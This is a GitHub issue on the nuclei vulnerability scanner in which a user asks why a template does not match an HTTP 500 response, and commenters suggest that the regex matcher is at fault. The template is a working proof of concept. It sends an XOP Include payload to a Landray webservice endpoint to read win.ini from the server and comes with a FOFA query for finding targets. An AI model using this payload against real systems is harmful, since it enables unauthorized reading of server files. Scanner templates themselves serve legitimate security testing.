Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] ...How do the nuclei match the result with status code 500 #5920

Open
1 task done
ltfafei opened this issue Dec 18, 2024 · 2 comments
Open
1 task done

[BUG] ...How do the nuclei match the result with status code 500 #5920

ltfafei opened this issue Dec 18, 2024 · 2 comments
Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.

Comments

@ltfafei
Copy link

ltfafei commented Dec 18, 2024

Is there an existing issue for this?

  • I have searched the existing issues.

Current Behavior

I have a requirement to match a result with a status of 500

But the nuclei fail to do so

Image

nuclei POC:

id: test

info:
  name: test
  author: test
  severity: high
  metadata:
    fofasearch:  body="Com_Parameter"

variables:
  boundary: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----{{boundary}}
        SOAPAction: ""

        ------{{boundary}}
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">
        <soapenv:Header/>
        <type><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:windows/win.ini"/></type>
        </arg0>
        </soapenv:Envelope>
        ------{{boundary}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "<soapenv:Envelope"

      - type: status
        status:
          - 500

Image

Image

Expected Behavior

How do the nuclei match the result with status code 500

Steps To Reproduce

How do the nuclei match the result with status code 500

Relevant log output

Environment

- OS: 
- Nuclei: 
- Go:

Anything else?

No response

@ltfafei ltfafei added the Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors. label Dec 18, 2024
@dogancanbakir
Copy link
Member

I couldn't repro with a more straightforward example. Could you share the complete repro steps? If possible, the target as well -my discord handle @dogancanbakir.

@nf-works
Copy link

nf-works commented Dec 19, 2024

I don't think the response code matcher is the issue, but your regex matcher.

"<soapenv:Envelope"

That is your request.
The response is without the env part. No?

I would also make it a simple text matcher, since you do not seem to use regex.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Projects
None yet
Development

No branches or pull requests

3 participants